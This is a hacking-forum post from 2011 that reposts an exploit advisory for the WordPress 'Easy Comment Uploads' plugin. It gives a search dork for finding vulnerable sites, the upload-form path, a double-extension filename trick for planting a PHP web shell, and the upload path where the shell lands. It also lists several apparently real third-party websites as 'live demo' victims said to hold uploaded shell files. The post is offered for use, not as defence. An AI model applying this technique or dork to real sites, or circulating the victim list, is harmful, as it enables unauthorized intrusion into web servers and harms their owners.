[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum » Hacking » Hack » Exploit Wordpress "/easy-comment-uploads/upload-​form.php" D (wanmadehope)
Exploit Wordpress "/easy-comment-uploads/upload-​form.php" D
satriaDate: Friday, 2011-08-05, 8:50 AM | Message # 1
Lieutenant colonel
Group: Administrators
Messages: 126
Reputation: 0
Status: Offline
------------------------------​------------------------------​----------------
| Title : Wordpress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/pl​ugins/easy-comment-uploads/
| Email : me@zonedevil.om
| Date : 15/06/2011
| Dork : "/easy-comment-uploads/upload-​form.php"
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Ubuntu]
------------------------------​------------------------------​----------------

*_Exploit_*

# http://[localhost]/[path]/easy​-comment-uploads/upload-form.p​hp
# http://[localhost]/easy-commen​t-uploads/upload-form.php

# File Extention [.txt],[.jpg],[gif],[bmp]

*_Preview_*

# site/wp-content/uploads/[years​]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/0​6/404.php;.txt

==============================​===========================

Live Demo :

http://eleventigers.net/111/wp​-content/uploads/2011/06/devil​.jpg
http://www.tremblantbar.com/wp​-content/uploads/2011/06/devil​.txt
http://www.tonicfoodclub.com/w​p-content/uploads/2011/06/devi​l.txt
http://accentspaintingplus.com​/wp-content/uploads/2011/06/de​vil.jpg
http://brownsupport.com/michol​....vil.txt

./Greetz : WanMadehope Cyber4rt
 
Forum » Hacking » Hack » Exploit Wordpress "/easy-comment-uploads/upload-​form.php" D (wanmadehope)
  • Page 1 of 1
  • 1
Search: